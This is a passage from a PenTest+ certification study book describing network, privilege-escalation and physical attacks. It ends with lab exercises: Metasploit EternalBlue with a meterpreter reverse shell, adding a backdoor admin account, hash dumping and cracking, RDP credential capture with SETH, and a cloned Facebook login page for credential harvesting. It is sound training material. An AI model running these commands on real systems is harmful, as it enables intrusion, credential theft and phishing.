exploits because the attacks are performed across the network — you do not need
local access to the systems. This is why you should always be leery of connecting
to an untrusted network such as an airport network, hotel network, or the net-
work in an Internet cafe. An attacker can be connected to those networks as well
and run a network-based exploit that attacks your system from across the net-
work! In the following sections we take a look at the common exploits used to take
advantage of network-based vulnerabilities.

182 PART 2 Attacks and Exploits
Common tools used for network-based
attacks
So far in this chapter, you have discovered many tools that can be used by pene-
tration testers during attacks, and the objectives of the PenTest+ certification
exam specifically references the following tools for network-based attacks that
you should be aware of:

»» Metasploit: As you learn earlier in this chapter, Metasploit is a framework
that contains a number of exploits against different products.

»» Netcat: Netcat is a common tool used to open a port on a system to allow
you to connect back to that system at a later time. Netcat can also be used to
establish the connection to the open port. You learn how to use Netcat in
Chapter 9.

»» Nmap: Nmap is a popular tool to discover systems that are running services
you wish to exploit. You learn about Nmap in Chapter 3.

Common network-based exploits
Network-based vulnerabilities exist in many common networking services and
protocols we use every day. Following are some common exploits used by pentest-
ers and attackers:

»» Name-resolution exploits: Name-resolution exploits are exploits against
technologies that resolve names to IP addresses, such as the NetBIOS name
service that converts computer names to IP addresses, and the Link-local
Multicast Name Resolution (LLMNR) protocol that converts hostnames to an
IPv4 or IPv6 address. Common name-resolution ports are UDP port 137
(NetBIOS name service), UDP 138 (NetBIOS datagram service), and TCP port
139 (NetBIOS session service).

»» Link-Local Multicast Name Resolution (LLMNR)/NetBIOS Name Service
(NBT-NS) poisoning: This exploit is a form of name-resolution attack where
the victim broadcasts a message to the network looking for the IP address of a
system that has a particular file share. An attacker intercepts this call and then
send the attacker’s server information so that the victim tries to connect to the
attacker’s system. During this process the attacker collects the credentials that
were passed during the connection attempt. Responder is an example of a
tool you can use to perform this type of attack.

CHAPTER 5 Exploiting Systems 183
 »» New Technology LAN Manager (NTLM) relay attacks: This exploit is an
older attack type on the NTLM protocol where attackers inject themselves
between a client and a server and are able to capture the password hashes.
Once the password hashes are obtained, attackers can then try their favorite
password crackers on the hashes.

»» SMB exploits: Server Message Block (SMB) is the file-sharing protocol for
Microsoft networks. In order to exploit a system with an SMB exploit, the
system must be running SMB and be vulnerable to the exploit (not patched).
The EternalBlue exploit used earlier in this chapter is an SMB exploit. SMB
uses TCP port 139 (NetBIOS) and TCP port 445.

»» SNMP exploits: The Simple Network Management Protocol (SNMP) is a
protocol used to monitor and manage network devices. A system running
SNMP may be vulnerable to SNMP exploits. SNMP uses UDP port 161.

»» SMTP exploits: The Simple Mail Transfer Protocol (SMTP) is the Internet
protocol for sending email. A system running an SMTP service, such as a web
server or email server, may be vulnerable to an SMTP exploit. SMTP uses TCP
port 25.

»» FTP exploits: The File Transfer Protocol (FTP) is a service that allows the
uploading and downloading of files from a machine running an FTP service.
If the system is not patched, it may be vulnerable to an FTP exploit. FTP uses
TCP port 20 and 21.

Note that if you are not running these services, you do not have to worry about
being attacked via these exploits. If you are running these services, you should
ensure that you patch the systems on a regular basis so that any known vulnera-
bilities are fixed.

As a penetration tester, there are a wealth of exploits against these services, so
using a port scan to discover systems running these services is critical. To locate
systems running the services using TCP ports, you can use Nmap as follows:

nmap -sS 192.168.2.0/24 -p 139,445,25,21

To locate the systems that run the services using UDP ports, run the following
Nmap command:

nmap -sU 192.168.2.0/24 -p 137,138,161

184 PART 2 Attacks and Exploits
Man-in-the-middle (MiTM) attacks
Man-in-the-middle (MiTM) attacks, now referred to as on-path attacks, are
common attacks used by hackers to insert themselves into the communication
path of their victim so that they can capture a copy of all communication sent
from the victim’s system. MiTM attacks are common attacks on wireless networks
such as an Internet cafe network, and also for password attacks to try to capture
passwords used on the network.

ARP poisoning
One type of MiTM attack is known as ARP poisoning. With ARP poisoning, the
attacker poisons the client’s ARP cache with the IP address of the default gateway
(the router) and associates that IP address with the attacker’s MAC address. The
reason for this is that the victim’s system will now send all Internet traffic to the
attacker’s system because the victim thinks the attacker is the router to get out to
the Internet. In this example, the hacker will enable routing on the hacker’s
system so that the system will send the victim’s traffic out to the Internet —
ensuring the victim does not suspect a thing!

Using Kali Linux, you can perform ARP poisoning by entering the following
command:

arpspoof -i eth0 192.168.2.1

This command will send out ARP reply messages on the network that interface
Eth0 is connected to and give the attacker’s MAC address for the IP address of
192.168.2.1 (the default gateway) to all systems on that network to store in their
ARP cache.

You will also want to ensure that your penetration testing system has routing
enabled using this command:

echo 1 > /proc/sys/net/ipv4/ip_forward

For the PenTest+ certification exam, remember that with ARP poisoning, also
known as ARP spoofing, the attacker will typically spoof the address of the default
gateway or router.

Capture, replay, and relay
Now that you have poisoned the ARP cache of the systems on the network, causing
them to send all Internet traffic to your penetration testing system, you can now
use a tool such as Wireshark or tcpdump to capture all the traffic to a capture file.

CHAPTER 5 Exploiting Systems 185
 Capturing network traffic means to record the network traffic to a file either for
later analysis or to be replayed. For example, if you want to capture all web traffic
to a file using tcpdump, run the tcpdump command:

tcpdump 80 -w webtraffic.pcap

To replay traffic is to submit it back on the network after it has been captured in
order to generate more network traffic. To replay traffic on the network from a
packet capture file, run the tcpreplay command:

tcpreplay -i eth0 webtraffic.pcap

You can also use tcpreplay to manipulate what data is played from the capture
file and the speed at which it is replayed.

You can also relay the traffic received, which is to forward any traffic that your
system receives on to another system. For example, as I mention earlier, you could
forward all traffic your penetration testing system receives from the clients on the
network to the default gateway address (the router). In this example, you simply
need to enable routing on the penetration testing system to relay all traffic to the
default gateway. This allows you to perform a MiTM attack and to receive all traf-
fic, but still route it out to the Internet so that the network clients do not notice
you are in the middle of the communication.

SSL stripping and downgrade
Two additional concepts related to MiTM attacks are SSL striping and downgrade
attacks. SSL striping occurs when the attacker is performing a MiTM attack and the
user is surfing a secure website (HTTPS), the attacker is able to remove the
encryption from the communication. The attacker accomplishes this by establish-
ing a secure connection (HTTPS) with the site the victim is visiting, but continues
to use HTTP to communicate with the victim. Because the attacker is the one vis-
iting the encrypted site, the attacker has the keys to decrypt the communication,
while having unsecure communication with the victim (see Figure 5-18).

A downgrade attack occurs when the hacker forces the victim to use a lower ver-
sion protocol that is considered unsecure and easily exploited. For example,
instead of using WPA2 wireless security, the attacker forces the user to use the
previous version of WPA, which is easier to crack the encryption key.

186 PART 2 Attacks and Exploits
 FIGURE 5-18:
SSL stripping to
bypass HTTPS.

Using SETH to perform a MiTM attack
You can use SETH, a script written by Adrian Vollmer of Syss Research, to perform
a MiTM attack and place your system between the Remote Desktop Protocol (RDP)
server and an RDP client to capture logon credentials. The following steps demon-
strate how to use SETH:

1. On your Kali system, run ifconfig in a terminal session and record the IP
address: _____________________.

2. Note the IP addresses of the RDP client and RDP server:

RDP client: _______________________________

RDP server: ______________________________

3. Launch a terminal session in Kali Linux.

4. Run the following commands to download SETH and then change to the
downloaded folder:

git clone https://github.com/SySS-Research/Seth.git
cd Seth

5. Run the following command to execute SETH (see Figure 5-19):./seth.sh eth0

Keep in mind that if the RDP server exists on a different subnet, you would use the
IP address of the router as the last parameter — not the IP address of the RDP
server. Kali Linux is injected into the middle of the communication by performing
ARP spoofing. When the client computer makes a connection to the RDP server,
you will see the credentials appear in the terminal on Kali.

CHAPTER 5 Exploiting Systems 187
 FIGURE 5-19:
Using SETH to
capture RDP
credentials.

Other common attacks
A number of other types of attacks can be performed on systems in order to gain
access to that system. Following are some common types of attacks to be familiar
with for the PenTest+ certification exam.

DNS cache poisoning
A common attack on systems is to attack a system’s DNS name resolution so that
you can direct victims to whatever system you want when they access common
DNS addresses. For example, if I want to capture a person’s Facebook logon infor-
mation, I could alter the victim’s hosts file on the hard drive of the victim after
compromising the system with another exploit. I can modify the host file so that
the fully qualified domain name (FQDN) of www.facebook.com points to a fake
website I set up that looks like the Facebook site. The victim would then try to log
on with their Facebook username and password, and I would store that informa-
tion in a database while giving the user a logon error that states, “Facebook is
having problems right now. Please try again.”

Pass the hash
Pass the hash is the idea that after you exploit a system, you can grab the hash val-
ues of the victim’s Windows passwords and then use that hash value to authenticate
to other servers on the network by supplying it as the password to those systems.
An example of using the pass the hash technique is provided in Chapter 8.

188 PART 2 Attacks and Exploits
DoS/stress testing
Another common attack type is a denial of service attack, or DoS attack. A DoS
attack is designed to overwhelm a system causing it to no longer respond to valid
requests from clients on the network or even crash the system. When performing
a penetration test, it is critical to verify whether DoS attacks are permitted. Typi-
cally they are not allowed because it causes service disruption.

When performing a penetration test on applications, you can perform a stress test
where you send a large workload to the application to see how it responds. Per-
forming a stress test during a penetration test is helpful to see how the application
would hold up to an attack in which the attacker tries to overload the system and
essentially perform a DoS attack.

As with DoS attacks, verify that stress testing is authorized during the penetration
test before performing one.

NAC bypass
As a security measure, companies invest in network access control (NAC) technolo-
gies in order to determine whether a device is allowed to connect to the network.
A NAC bypass attack is used by the attacker to bypass the NAC features that control
who can gain access to the network. An attacker can typically bypass the NAC by
spoofing the MAC address of their system to that of an authorized device such as
a printer or VoIP phone.

VLAN hopping
Companies today separate systems into different networks known as VLANs. For
example, the accounting department may be on VLAN1, while the rest of the com-
pany is on VLAN2. With VLANs, the systems on one VLAN are typically inaccessi-
ble to the systems on the other VLAN. There are different methods used to exploit
VLANs and gain access to traffic on another VLAN. Two methods are Switch spoof-
ing and double tagging.

Switch spoofing occurs when the attacker impersonates the switch by running the
VLAN tagging protocol and the VLAN trunking protocol, which are designed to
manage the VLAN system.

Double tagging is a technique used by the attacker to tag a frame for multiple
VLANs, allowing the frame to be transmitted to VLANs it typically would not be
allowed.

CHAPTER 5 Exploiting Systems 189
 MAC spoofing
MAC spoofing occurs when attackers or penetration testers alter the MAC address
or the source MAC address in a frame. The purpose of altering the MAC address is
so that attackers or pentesters can hide their identities or bypass any security
controls that would block systems by MAC addresses. For example, with wireless
networking, the access point is only allowing connections from systems listed in
the MAC filtering feature, so attackers could spoof their MAC addresses so that
they appear as one of those systems.

Exploiting Local-Host Vulnerabilities
Now that you understand some of the network vulnerabilities and methods used
to exploit network environment, let’s take a look at some common vulnerabilities
and exploits that affect the local systems themselves.

In this section, we look at some of the operating systems and services and proto-
cols that may be vulnerable to exploits. We then look at some of the common
vulnerabilities and exploits for Windows and Linux systems.

Operating system vulnerabilities
Systems today are running a variety of different operating systems, and each
operating system has its own list of vulnerabilities. As a penetration tester, you
can use a vulnerability scanner to identify the vulnerabilities of each of these
systems:

»» Microsoft Windows: Windows 10 is the current desktop operating system in
the Windows line. Windows systems should be kept up-to-date with security
patches to ensure that known vulnerabilities are patched. Windows systems
are a huge target due to their popularity on a corporate network and at home.

»» macOS: Over the years there have been a number of vulnerabilities with the
macOS including the Dock vulnerability (which allowed physical access to the
host), the Mail vulnerability (which allowed the attacker access to messages
intended for others), and the LaunchServices vulnerability (causing a DoS).
Those are just a few examples of vulnerabilities on the macOS.

»» Linux: Although Linux systems have a great reputation in the security field,
some versions of Linux may be vulnerable to DoS attacks or arbitrary code
execution due to vulnerabilities in some kernel versions.

190 PART 2 Attacks and Exploits
 »» Android: Android is a common operating system on different types of devices
such as smartphones and TV boxes. Android systems have a number of
client-side vulnerabilities, vulnerabilities if the attacker has physical access,
and vulnerabilities that can be leveraged without administrator rights.

»» iOS: iOS is the operating system for iPhones. Reported vulnerabilities with iOS
include memory corruption issues that cause issues with confidentiality,
integrity, and availability.

Unsecure service and protocol
configurations
Attackers most often gain access to host systems due to vulnerabilities in either a
service or daemon that is running on that system, or a protocol configuration set-
ting on the host system that creates the weakness in the system. You can use
nmap to discover running services on a host system and use Nessus to discover
known vulnerabilities on that system. Once you know of a few vulnerabilities, you
can then search Metasploit for an exploit to that vulnerability.

The service or protocol may have vulnerabilities, or the vulnerability may be due
to the way the service is configured. For example, the web sites for WWW services
could be configured to use default folders with default permissions. It is recom-
mended that you always alter any default configuration settings if possible, to
create a more secure system.

Privilege escalation
Privilege escalation occurs when the attack exploits a vulnerability in the system
to gain elevated permissions to the system, applications, or the data. This elevated
permission is typically that of administrative capabilities that allow the attacker
to manipulate the system any way the attacker wants.

Linux-specific
Following are some common techniques you can use to gain elevated privileges on
Linux systems:

»» SUID/SGID programs: Many programs, such as ping, require root-level access
when a user executes the program. These programs will execute with
root-level privileges because the SUID (set user ID) bit is set on the program
and the owner is set to root. It is possible that if attackers can exploit a
program that runs as root, attackers can elevate their privileges to root level.

CHAPTER 5 Exploiting Systems 191
 SGID is similar in concept, but it is used to specify that the program is to
execute with the group permissions assigned to the program.

»» Unsecure SUDO: SUDO is a program in Linux that allows a user to run a
program as another user. It originally was used to run programs as root (also
known as a superuser), but it now allows users to specify the account to run
as. Allowing programs as SUDO can lead to privilege escalation if the attacker
can figure out how to shell out of the command while it is running and then
execute any shell commands the attacker wants.

»» Ret2libc: CPUs use a no-execute bit to flag areas of memory that are for
storage and not for executing code. The ret2libc attack is used to overwrite
the return address of a non-execute subroutine so that it refers to a subrou-
tine that is already in the execute area of memory used by the program. This
can allow for the attacker to bypass the no-execute memory feature.

»» Sticky bit: Sticky bit is a Linux feature that ensures only the owner or root
user can rename or delete a file. If sticky bit is not set, any user with execute
and write permissions can rename or delete the file.

Windows-specific
To gain elevated privileges on Windows systems, a number of techniques can be
used, such as the following:

»» Cpassword: If administrators of Windows systems are using some of the
features of Group Policy Preferences, it is possible that credential information
is stored in an XML file on Sysvol that contains the encrypted passwords in a
property called cpassword. After obtaining the encrypted cpassword setting
from the XML file, attackers can use the PowerSploit Get-GPPPassword
function to crack the password.

»» Clear text credentials in LDAP: Lightweight Directory Access Protocol
(LDAP) is the directory access protocol used to query directory services such
as Active Directory. Like protocols such as HTTP or FTP, LDAP does not encrypt
communication, so it is possible for an attacker to gain access to credentials
that are sent in clear text across the network.

»» Kerberoasting: Kerberoasting is the process of stealing credentials used by
service accounts on a network that is using Kerberos authentication. The
attacker does this by scanning Active Directory for accounts with service
principal names (SPNs) associated with them, then sends request for service
tickets using those SPNs. Using Mimikatz, the attacker can then extract the
service ticket and save them to a file because they contain password hashes.
The hacker can then crack the passwords offline.

192 PART 2 Attacks and Exploits
 »» Credentials in LSASS: The Local Security Authority Subsystem Service (LSASS)
is responsible for security services in Windows such as logging users onto the
system. Using the LSASS, it is possible to dump the password hashes to a file
to be cracked.

»» Unattended installation: Using unattended installations, especially with
older versions of Windows, could create vulnerabilities if default installation
settings are used.

»» SAM database: Vulnerabilities within Windows could give access to the SAM
database in Windows, which contains the usernames and hashed passwords
for the Windows system.

»» DLL hijacking: A Dynamic Link Library (DLL) is a file that contains functions
that are to be called by other applications. DLLs are a common way to share
code between applications and are very common in Windows. DLL hijacking
occurs when an attacker tricks your application into loading a malicious DLL
instead of one of the common DLLs on the system. Once the malicious DLL is
loaded by the application, the malicious code can execute and cause harm to
the system.

Exploitable services
Any unpatched services running on a system could allow an attacker into the sys-
tem after the attacker exploits the unpatched or vulnerable service. Following are
two common issues to watch for:

»» Unquoted service paths: An attacker can gain system-level privileges if the
attacker can take advantage of unquoted service paths, which is a vulnerabil-
ity found when a service references an executable path that contains spaces
without using quotes. If quotes are not used, it is possible for the attacker to
manipulate the path to reference a different executable.

»» Writable services: When investigating services running on a system, you may
discover writable services where you can modify the configuration of the
service to execute the program code of choice with the sc config command:

sc config MyService binpath= "d:\MyService.exe"
sc config MyService obj="Admin" password="pass"
net stop MyService
net start MyService

CHAPTER 5 Exploiting Systems 193
 Unsecure file/folder permissions
Systems with non-secure file and folder permissions configured can be vulnerable
to a number of different types of attacks. Attackers may be able to gain access to
sensitive data or modify information on the system. This is true of systems that
have been installed with default installation options, as often the default config-
uration of the system may have unsecure file and folder permissions set.

Keylogger
A compromised system could be vulnerable to a keylogger running on the system.
A keylogger records the keystrokes of the user and either stores them in a file for
the hacker to retrieve later, or sends them to the hacker. The recorded keystrokes
could reveal sensitive information such as the usernames and passwords of
accounts being used by the victim.

Scheduled tasks
Scheduled tasks are programs that are scheduled to run at regular intervals such as
at a specific time, when the system starts up, or when the user logs on. If the pro-
gram that is scheduled to run is vulnerable to attack, it could allow the attacker
into the system when it runs.

Kernel exploits
The kernel is the core code of the operating system. When this code runs it has
system-level privileges, which is full access to the system. If an attacker exploits
vulnerabilities found in kernel mode code, the attacker could have full control of
the system. Be sure to apply security patches to the system to protect against
these types of attacks.

Default account settings
Software that creates default accounts as part of the installation process may
expose the system or application to security risks. Some examples of account set-
tings that present security risks are default user account names, default pass-
words, and non-expiring password settings.

A simple way to attempt to gain access to a device or system is to research default
account settings such as usernames and passwords.

194 PART 2 Attacks and Exploits
Sandbox escape
Sandbox environments are environments that run software in a contained envi-
ronment that is designed to not allow the software to access anything outside the
sandbox. For example, you could run software in a contained environment by run-
ning it in a virtual machine (VM). Sandbox escape refers to when malicious code
run in a sandbox is able to access resources outside the sandbox. Following are
some examples of sandbox escape exploits:

»» Shell upgrade: A restricted shell is a shell environment with limited permis-
sions. A shell environment vulnerable to sandbox escaping techniques could
give an attacker elevated permissions.

»» VM: A sandbox escape exploit in a virtual machine environment could result
in the attacker gaining access to resources outside the VM and on the host
system.

»» Container: Containers are minified virtual machine environments, and like
VMs, if sandbox escape exploits are performed, the attacker could gain access
to resources out of the container — specifically the host operating system.

Physical device security
Software is not the only item at risk to exploitation. Hardware devices can also
have vulnerabilities exploited by the attacker to gain access to the device. Follow-
ing are examples of such exploits:

»» Cold boot attack: If an attacker can get physical access to a system, the
attacker can perform a cold boot attack, which involves the attacker perform-
ing a hard reset of the system in order to perform a memory dump and grab
sensitive information such as encryption keys.

»» JTAG debug: The Joint Test Access Group (JTAG) is a type of interface that
allows you to communicate with computer chips on a board. It is typically
used by manufacturers to test connections between pins on a computer chip.
An attacker with physical access to the system could connect to the JTAG
interface and use a debugger such as OpenOCD to send commands to the
device.

»» Serial console: Many devices such as routers and switches have a console port
on the back of the device that is used to administer the device. If an attacker
can gain access to your server room with the routers and switches, the attacker
could get console access to the device and modify its configuration.

CHAPTER 5 Exploiting Systems 195
Lab Exercises
In these exercises, you experiment with some of the exploit techniques discussed
in this chapter. Remember that all exercises should be performed in a test lab
environment and not on your production network. You will need the Kali Linux
VM, Win7A, and Server 2012 VM. Record the IP address of each VM below:

Kali: _____________________________

Win7A: ___________________________

Server 2012: _______________________

Exercise 5-1: Exploit an SMB
service with Metasploit
In this exercise, you exploit the SMB service running on the Win7A VM and then
create a user account that you could use as a backdoor to the system even after the
system is patched. Remember that these exercises should be run on lab computers
and not on production systems.

1. Ensure you have the Kali Linux VM, Win7A VM, and the Server 2012 VM
running.

2. Launch a terminal prompt on the Kali Linux VM.

3. Type msfconsole to start using Metasploit.

Because you performed a vulnerability scan on the Win7A VM in the last
chapter, you know that the Win7A system is vulnerable to the EternalBlue
exploit.

4. To search for the ExternalBlue exploit type search ExternalBlue.

5. To locate the exploit by the Microsoft security bulletin ID, type search
MS17-010.

6. To exploit the Windows 7 VM, run the following command to select the
ExternalBlue exploit:

use exploit/windows/smb/ms17_010_eternalblue

7. To see what options need to be configured, run the following command
(you are looking for mandatory options):

show options

Note that the remote host option (RHOST) is the only mandatory option.

196 PART 2 Attacks and Exploits
 8. To set the remote host to the IP address of your Windows 7 VM, run the
following command:

set RHOST

9. To verify that your change has taken, run the show options command
again.

10. Type exploit to run the exploit and attack the Windows system.
After a few seconds you should see WIN!, indicating that you were successful in
compromising the system. Note that you are at a Windows command
prompt now.

11. To show that you have full administrator capabilities, create an adminis-
trative account on the target system with the following commands:

net user lab51hacked Pa$$w0rd /add
net localgroup administrators lab51hacked /add

12. To verify that the user account was created, type net user again.
13. Press CTRL+C to exit out of the exploit.
14. Close all windows in Kali Linux, but leave the VMs running for the next
exercise.

Exercise 5-2: Use the meterpreter
exploit payload
In this exercise, you exploit the SMB service running on the Win7A VM with the
meterpreter payload. After exploiting the system, you will obtain a list of the pass-
word hashes and then crack them with John the Ripper. Remember that these
exercises should be run on lab computers and not on production systems.

1. Ensure you have the Kali Linux VM, Win7A VM, and the Server 2012 VM
running.

2. Launch a terminal prompt on the Kali Linux VM.

3. Type msfconsole to start using Metasploit.

4. To exploit the Windows 7 VM, run the following command:

use exploit/windows/smb/ms17_010_eternalblue

5. To see what options need to be configured, run the following command
(you are looking for mandatory options):

show options

Note that the remote host option (RHOST) is the only mandatory option.

CHAPTER 5 Exploiting Systems 197
 6. To set the remote host to the IP address of your Windows 7 VM, run the
following command:

set RHOST

7. To verify that your change has taken, run the show options command
again.

8. To change the payload so that a meterpreter shell is obtained, run the
following command:

set payload windows/x64/meterpreter/reverse_tcp
show options

Do you see the LHOST payload option is required?

9. Run the following command to set the LHOST option:
set LHOST

10. Type exploit to run the exploit and attack the Windows system.
After a few seconds you should see the meterpreter> prompt. At this point
we can use any of the meterpreter commands. You learn more about the
meterpreter commands in Chapter 8, but let’s try a few of them out.

11. In the meterpreter session, type sysinfo to view the information about
the system you have exploited and note the computer name.

12. To retrieve the password hashes from the compromised Windows
system, run the following command:

run post/windows/gather/hashdump

13. To copy the password hashes, select all of the output from the hashdump
command, right-click on the highlighted area, and choose Copy.

14. Select Applications ➪   Usual Applications ➪   Accessories ➪   Text Editor.
15. Paste the copied usernames and password hashes into the text editor.
16. Save the file as Lab52_PasswordHashes.
17. Launch a new terminal and run the following command to use John the
Ripper to crack the password hashes:

john --format=NT Lab52_PasswordHashes

Within a short time, the password hashes should be cracked. Figure 5-20 shows
a sample hash file and the password hashes being cracked. Note that the
usernames are on the right in brackets and the cracked passwords are on the
left. For example, I have a user named user1 that has a password of house.

198 PART 2 Attacks and Exploits
 FIGURE 5-20:
Cracking
Windows
passwords with
John the Ripper.

18. Close all windows in Kali Linux.

Exercise 5-3: Conduct a MiTM
attack with SETH
In this exercise, you download and use SETH to capture remote desktop logon
credentials. Remember that these exercises should be run on lab computers and
not on production systems.

1. Launch a terminal in Kali Linux.

2. Run the following commands to download SETH and then change to the
downloaded folder:

git clone https://github.com/SySS-Research/Seth.git
cd Seth

3. Run the following command to execute SETH:./seth.sh eth0

4. With SETH running, switch over to the Win7A VM.

5. Click the Start button, type mstsc, and press Enter to launch the remote
desktop client.

6. In the remote desktop client, type the IP address of the Windows Server
and choose Connect.

It may take a minute, but it should ask you for credentials.

7. Type the username of administrator and the password of Pa$$w0rd and
finish connecting.

8. Switch over to Kali Linux and scroll up to review the information in the
SETH output.

Do you see the username and password?

9. Close all windows in Kali Linux.

CHAPTER 5 Exploiting Systems 199
 Exercise 5-4: Use SET for credential
harvesting
In this exercise, you use the Social-Engineer Toolkit (SET) to capture Facebook
logon credentials. Remember that these exercises should be run on lab computers
and not on production systems.

Phase 1: Set up the cloned site
1. Launch a new terminal on your Kali Linux system.
2. In the terminal session, run the setoolkit command to launch SET.
3. Choose y to agree to the terms of use and go to the SET main terminal
screen.

4. Type 1 to perform a social engineering attack and press Enter.
5. Type 2 for Website Attack Vectors and press Enter.
6. Type 3 to perform a credential harvester attack and then press Enter.
7. Type 2 to choose Site Cloner and press Enter.
8. Type the IP address of your Kali Linux and press Enter.
You are then asked which website to clone.

9. Type https://www.facebook.com.
The Facebook login page is copied to your Kali system and set up to listen on
port 80.

10. To test the site, launch a browser and type http://.
You should see what appears to be the Facebook site.

Phase 2: Trick the victim into visiting the fake site
11. While SET is running on Kali Linux, go to the Win7A VM.
12. Launch a browser and type http://.
The Facebook logon page should appear.

13. Try to log on with the following credentials:
Username: [email protected]

Password: Pa$$w0rd

200 PART 2 Attacks and Exploits
Phase 3: Check the harvester file for passwords
As users are attempting to log on to the fake Facebook site, SET is logging the
usernames and passwords. You can have a report generated by following these
steps:

14. Switch back to the terminal running SET.
You should see some activity was generated in SET.

15. Press CTRL+C to generate a report.
Note that the reports are stored in the /root/.set/reports folder. There is
an HTML and an XML report.

16. To check out the HTML report, click the folder icon in the Kali toolbar and
then choose Home on the left.

17. Note that by default Kali is not showing hidden folders so choose the
Options button to the left of the minimize button in the folder window.

18. Choose the Show Hidden Files check box at the bottom.
Now you can see the.set folder.

19. Naviga